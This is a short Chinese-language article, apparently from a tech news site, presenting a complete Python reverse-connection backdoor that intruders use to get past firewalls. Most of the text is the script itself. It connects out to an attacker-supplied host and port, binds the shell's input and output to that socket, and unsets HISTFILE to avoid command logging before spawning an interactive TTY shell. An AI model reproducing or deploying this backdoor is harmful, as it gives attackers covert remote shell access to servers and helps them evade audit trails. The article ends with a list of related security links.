看黑客如何用python编写ttyshell的反向链接后门

很多入侵者都会在正面遇到防火墙之后，采用反向链接的方法控制远程服务器。早期大家都用perl或c代码写。现在大家都与时俱进了，用python写了。代码量减少很多啊。

小雨写的一个，替代之前的perl版本的，可以直接返回ttyshell。返回的shell可以直接ssh，su等操作。

代码如下：

#!/usr/bin/python
import sys
import os
import socket
import pty

shell = "/bin/sh"

def usage(programname):
print "ython connect-back door"
print "Usage: %s " % programname

def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
pty.spawn(shell)
s.close()

if __name__ == "__main__":
main()

【编辑推荐】

1. 最受黑客“青睐”7款软件 Adobe抢微软风头
2. FreeBSD 7.1到8.0皆有漏洞 可获root权限堪称圣诞礼物
3. 利用Linux系统IP伪装抵住黑客攻击
4. Vista、Leopard、Linux 三大OS黑客大赛各显神通
5. 企业需要在应用程序开发时保证数据安全
6. “云”火墙让Cisco防火墙能够与众不同
7. ISA防火墙简单安装配置实例
8. 下一代防火墙有效应对安全新变化
9. 如何选择应用防火墙以确保企业网安全